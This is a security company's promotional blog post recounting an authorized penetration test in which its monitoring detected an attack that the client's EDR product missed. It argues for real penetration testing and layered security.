Most businesses trust their cybersecurity software to alert them when something goes wrong. They pay for it every month, they see the dashboard light up green, and they assume they're covered. We just proved that trust might be misplaced.
A company hired us to run a real penetration test against their network. Not a simulation. Not a checkbox exercise. An actual attack using the same tools and techniques that real threat actors use every day. What happened next told us everything we needed to know about the state of cybersecurity tooling in 2026.
Concerned about whether your security tools are actually working? Learn how SkyNet MTS builds layered cybersecurity programs that don't rely on a single vendor's promises. Explore our cybersecurity services.
Watch: We Ran a Real Attack. Our SOC Caught It. The EDR Didn't.
What Happened
We used the same penetration testing tools and techniques used by both professional security teams and real-world attackers to launch an attack against a workstation on their network. This was a fully authorized engagement. The company hired us to do exactly this. Everything was above board.
The attack targeted a known vulnerability. We gained access to the machine, established a persistent connection, and began performing the kinds of actions an attacker would take once inside a network: enumerating the system, escalating privileges, and moving through the environment.
Here's where it gets interesting.
As part of our process, we deploy monitoring software on the target workstation to capture everything that happens during the attack -- every connection, every process, every privilege escalation attempt. This is how we build the report that shows the company exactly where their weaknesses are so they can address them. That monitoring picked up the attack within seconds. Every stage was visible in real time.
The company's endpoint detection and response product -- a widely used, industry-leading EDR platform, the kind deployed across thousands of MSPs and internal IT departments -- reported absolutely nothing.
Not after one minute. Not after one hour. Seven hours later, still nothing.
No alert. No flag. No detection of any kind. The green dashboard stayed green while an active attack was happening on the machine it was supposed to be protecting.
Why This Matters More Than You Think
This wasn't some exotic zero-day exploit that nobody has ever seen before. The tools and techniques we used are publicly available and well-documented. If your security tooling can't detect an attack using common, widely known methods, what exactly is it protecting you from?
Here's the uncomfortable truth: most businesses have no idea whether their cybersecurity tools actually work. They buy software on a vendor's recommendation, see a dashboard full of green checkmarks, and assume the job is done. Nobody tests it. Nobody verifies it. Nobody asks the obvious question: "Would this catch a real attacker?"
And when a real attacker shows up -- not with a test, but with ransomware or data exfiltration -- that's when businesses find out the answer. By then it's too late.
Vulnerability Assessment vs. Penetration Testing: Know the Difference
Part of the problem is that most businesses don't understand what they're actually buying when it comes to security testing. Two terms get thrown around interchangeably, but they are very different things.
A vulnerability assessment is a scan. Software looks at your systems and produces a list of known weaknesses -- outdated software, missing patches, misconfigured settings. It tells you what could be a problem. Think of it as a home inspector walking through your house and noting that the back door lock is loose.
A penetration test is an actual attack. A security professional tries to break into your systems using the same tools, techniques, and creativity that a real attacker would use. It doesn't just find the loose lock -- it picks it, walks inside, and shows you exactly what an intruder could access. It tells you what is a problem, right now, in practice.
Most businesses that think they've had a "pentest" have actually had a vulnerability scan. And most businesses that rely on a single EDR product have never tested whether it would actually catch someone breaking in. That gap between assumption and reality is where breaches happen.
Why EDR Products Miss Active Attacks
EDR tools aren't useless. They do catch things. But many of them are built primarily around signature-based detection -- they recognize known malware, known file hashes, known patterns of bad behavior. If an attacker uses a technique that doesn't match a signature in the database, the tool doesn't see it.
Modern attackers know this. They use fileless malware, living-off-the-land techniques (using legitimate system tools for malicious purposes), and custom payloads that don't match any known signature. The attack surface has changed. The tooling, in many cases, hasn't kept up.
There's also a business model problem. Many EDR vendors sell to thousands of MSPs and IT teams who deploy the product and move on. The vendor's job is to minimize false positives so the product doesn't generate too many alerts, because alert fatigue leads to customer churn. The unintended consequence: the product is tuned to be quiet. Quiet is good for customer satisfaction. Quiet is terrible for catching real attacks.
This is exactly why layered security matters. No single product should be the only thing standing between your business and a breach. You need independent monitoring -- a second set of eyes that doesn't rely on the same detection engine, the same signature database, or the same vendor's priorities.
What You Should Do About It
If you're reading this and wondering whether your own security tools would pass the same test, here's what we'd recommend:
1. Test your tools with a real penetration test
Not a vulnerability scan. Not a compliance checkbox. An actual, authorized attack against your environment, conducted by professionals who know how to simulate real-world threat actors. If your tools can't detect it, you need to know that before an attacker shows you the hard way.
2. Don't rely on a single product
Layered security isn't a buzzword. It's a design principle. Your EDR should be one layer. Independent SIEM monitoring should be another. AI-driven behavioral analysis adds a third. Each layer catches what the others miss. That's how real security works.
3. Ask your IT provider hard questions
When was the last time they tested your defenses? Not scanned -- tested. Can they show you evidence that your tools detected a simulated attack? If the answer is "we haven't done that," you have a gap that needs closing.
4. Stop trusting dashboards
A green dashboard means the software is running. It does not mean you are secure. Those are two very different statements, and treating them as the same thing is one of the most common and most expensive mistakes businesses make.
5. Demand independent verification
Your security provider should be able to prove their tools work. Not with a marketing brochure or a case study from someone else's environment. With real test results from your network, your machines, your attack surface. If they can't do that, ask yourself what you're paying for.
The Bottom Line
The monitoring software we deployed during the test caught the attack in seconds. The company's EDR product -- widely deployed, industry-leading -- missed it entirely for over seven hours. That's not a minor gap. That's a fundamental failure of the product to do the one thing it was designed to do.
Your business deserves better than blind trust in a vendor's green dashboard. Test your tools. Verify your defenses. And if your current setup can't catch a real attack, it's time to start asking harder questions about what you're paying for.
